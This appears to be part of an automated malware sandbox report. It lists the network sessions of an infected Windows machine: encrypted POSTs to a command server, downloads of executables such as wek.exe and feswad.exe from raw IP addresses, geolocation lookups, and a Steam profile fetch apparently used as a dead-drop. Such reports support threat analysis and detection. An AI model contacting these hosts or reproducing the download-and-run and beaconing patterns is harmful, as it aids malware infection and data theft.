                                                                                              Data Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                              Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              36192.168.2.449788158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:02.640033007 CEST285OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://jpkolefxkmrqfjw.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 355
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:30:02.640075922 CEST355OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 85 66 5d 02 c8 a1 c1 64 5d 85 da 13
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d]te5eWGm }J90weQNF:V|w[p0L80qjXs.4|W^"W,P9]#kh'(6%){6qY924H_S(
                                                                                              May 25, 2024 21:30:03.391330004 CEST222INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:30:03 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 5e 39 5c a2 f3 df fc fc 48 eb 0b db 69 f9 53 47 91 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 27I:82O^9\HiSG0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              37192.168.2.44978991.92.253.69802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:03.404542923 CEST157OUTGET /wek.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: 91.92.253.69


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              38192.168.2.449797158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:14.919115067 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://duxgasiuxdjh.com/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 159
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:30:14.919148922 CEST159OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 82 66 5d 02 c8 a1 c1 64 1b 92 c6 75
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]duw!UN8X7nh1T88k=rG>2[QZ)k$"3\@f>l
                                                                                              May 25, 2024 21:30:15.783257008 CEST227INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:30:15 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 47 a4 e8 dd e1 e4 40 f0 4f 91 64 b2 45 48 95 01 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 2cI:82OI:G@OdEH10


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              39192.168.2.449798185.154.13.143802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:15.807744026 CEST162OUTGET /feswad.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: 185.154.13.143


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              40192.168.2.449802158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:22.918329000 CEST281OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://dejiweyxqsl.net/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 142
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:30:22.918329000 CEST142OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 83 66 5d 02 c8 a1 c1 64 50 be af 32
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]dP2U'Sd+S&mqm*815.F1cL#\R0T
                                                                                              May 25, 2024 21:30:23.660547018 CEST248INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:30:23 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc ab 15 b0 08 db 6f a7 18 5c 9b 08 bf eb 3b af 2d 50 0a f3 dd c6 5b ee 52 c6 41 83 aa 76 d2 26 eb b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 41I:82OTeo\;-P[RAv&~0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              41192.168.2.449805158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:25.031122923 CEST285OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://jyqccrxyqqnpjdg.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 162
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:30:25.031122923 CEST162OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 80 66 5d 02 c8 a1 c1 64 2e 83 a4 13
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d.#wq,5d9.\{{0%=;tS'CVOZHyMLFw[!0$
                                                                                              May 25, 2024 21:30:25.770488977 CEST235INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:30:25 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 39 41 a3 e8 dd e1 f8 5f f5 4a 89 2d bb 53 51 90 4a fb ef 2c f3 2b 42 1a ae b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 34I:82OI9A_J-SQJ,+BW0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              42192.168.2.449806193.233.132.167802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:25.792712927 CEST170OUTGET /lend/jfesawdr.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: 193.233.132.167


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              43192.168.2.449810158.160.165.129802580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              May 25, 2024 21:30:30.914263964 CEST282OUTPOST /index.php HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Accept: */*
                                                                                              Referer: http://thhfncmsprqy.org/
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Content-Length: 254
                                                                                              Host: trad-einmyus.com
                                                                                              May 25, 2024 21:30:30.914316893 CEST254OUTData Raw: 12 87 8a e2 1b f2 d0 b1 bd 3f 76 31 79 b9 e2 8e 35 65 dd 43 a7 44 1a 9c ba 9a db 86 f2 a2 95 84 68 c6 54 d3 1b 1c b8 95 9e d2 f3 d3 da 9d 1f 18 15 e5 7a bf e4 ec aa 80 eb 5c bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 81 66 5d 02 c8 a1 c1 64 5e 92 af 34
                                                                                              Data Ascii: ?v1y5eCDhTz\Fu$f]d^408VSW\QItoO8Pt$S!JP}j6astX1RM%"Yd2at<n^@7.o?hQgQa-@X%`)'TO;Z
                                                                                              May 25, 2024 21:30:31.639491081 CEST376INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.20.2
                                                                                              Date: Sat, 25 May 2024 19:30:31 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 63 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 53 da 46 d4 f7 20 86 24 e6 ad 90 52 23 e5 b4 4c 2b f8 a5 b4 6a f6 99 bc 5d af 72 94 cb 32 45 5d 39 0f 4e df a1 3d fd d4 55 84 ac c8 42 c6 36 9d 95 69 77 64 f9 7a 3a 9c c6 9d c6 76 ed 39 08 84 5a b0 4d e3 e6 d3 36 81 c7 fc 3f d7 38 f9 fb 91 e0 01 83 c4 c3 4c 1c c3 03 ae eb b4 c0 a9 ac 4f 1c ff 74 88 d8 29 82 7b 32 45 b6 88 f9 b7 ae 1a b1 4b 64 c0 c6 ba e2 d9 ba 78 d6 27 35 60 3a 6a e8 81 03 9d 78 ab a8 af 2d 90 d6 d7 44 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: c1I:82OB%,YR("XSF $R#L+j]r2E]9N=UB6iwdz:v9ZM6?8LOt){2EKdx'5`:jx-D0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.449746188.114.96.34437048C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:37 UTC85OUTGET /geo.json HTTP/1.1
                                                                                              User-Agent: Microsoft Internet Explorer
                                                                                              Host: api.2ip.ua
                                                                                              2024-05-25 19:29:37 UTC893INHTTP/1.1 200 OK
                                                                                              Date: Sat, 25 May 2024 19:29:37 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              strict-transport-security: max-age=63072000; preload
                                                                                              x-frame-options: SAMEORIGIN
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1; mode=block; report=...
                                                                                              access-control-allow-origin: *
                                                                                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTtVoIrPRJg%2BFjrGzwJPwIxRnEWr5w2e%2Fgq8KdT93fpTnVhvCuCPGwd%2FmDYTL%2BYb9d6jJPcQZatoP5qRBzTlOBLEb47ozAHnvA%2FCFwon6STvlam1XpkG1rQKLGbD"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8897ef728ae8422b-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-05-25 19:29:37 UTC419INData Raw: 31 39 63 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34
                                                                                              Data Ascii: 19c{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044
                                                                                              2024-05-25 19:29:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.449751188.114.96.34432764C:\Users\user\AppData\Local\Temp\E609.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:40 UTC85OUTGET /geo.json HTTP/1.1
                                                                                              User-Agent: Microsoft Internet Explorer
                                                                                              Host: api.2ip.ua
                                                                                              2024-05-25 19:29:41 UTC895INHTTP/1.1 200 OK
                                                                                              Date: Sat, 25 May 2024 19:29:41 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              strict-transport-security: max-age=63072000; preload
                                                                                              x-frame-options: SAMEORIGIN
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1; mode=block; report=...
                                                                                              access-control-allow-origin: *
                                                                                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hw09jiZJcDMGWjmbkMeVyR%2B0kMOaNkRNoozkhYW4NkR7Ni%2BVzj%2BQ%2Fj2KdywtwFJ3rOYiqtcHYA6CO7a3e%2BOIjuOcmBWz5YZuyWdLxyAKSeFDh0k4H6HtUZ%2BKrXDh"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8897ef862bda43dd-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-05-25 19:29:41 UTC419INData Raw: 31 39 63 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34
                                                                                              Data Ascii: 19c{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044
                                                                                              2024-05-25 19:29:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.449755188.114.96.34435436C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:42 UTC85OUTGET /geo.json HTTP/1.1
                                                                                              User-Agent: Microsoft Internet Explorer
                                                                                              Host: api.2ip.ua
                                                                                              2024-05-25 19:29:42 UTC891INHTTP/1.1 200 OK
                                                                                              Date: Sat, 25 May 2024 19:29:42 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              strict-transport-security: max-age=63072000; preload
                                                                                              x-frame-options: SAMEORIGIN
                                                                                              x-content-type-options: nosniff
                                                                                              x-xss-protection: 1; mode=block; report=...
                                                                                              access-control-allow-origin: *
                                                                                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                              CF-Cache-Status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Phs4rCFKiaDmF%2B3BGuLqeJ7kXDLOaUvRxMf9eBwtMXcVaVFluPCRlJGHxDf32FQ7G%2F7QTKX%2Bcyog%2FYCxuqyibVgVqtcvAM4PNxY0TdYQfyD88hya4KxRK3O2ntC"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8897ef901c710f70-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-05-25 19:29:42 UTC419INData Raw: 31 39 63 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34
                                                                                              Data Ascii: 19c{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044
                                                                                              2024-05-25 19:29:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.449756103.174.152.664432580C:\Windows\explorer.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:43 UTC170OUTGET /klok.exe HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Host: www.safeautomationbd.com
                                                                                              2024-05-25 19:29:44 UTC396INHTTP/1.1 404 Not Found
                                                                                              Connection: close
                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              content-type: text/html
                                                                                              content-length: 708
                                                                                              date: Sat, 25 May 2024 19:29:44 GMT
                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                              2024-05-25 19:29:44 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449762104.102.42.294435316C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-05-25 19:29:46 UTC119OUTGET /profiles/76561199689717899 HTTP/1.1
                                                                                              Host: steamcommunity.com
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              2024-05-25 19:29:46 UTC1882INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Date: Sat, 25 May 2024 19:29:46 GMT
                                                                                              Content-Length: 35682
                                                                                              Connection: close
                                                                                              Set-Cookie: sessionid=037852c11ef0b5bf1badbbf2; Path=/; Secure; SameSite=None
                                                                                              Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
                                                                                              2024-05-25 19:29:46 UTC14502INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
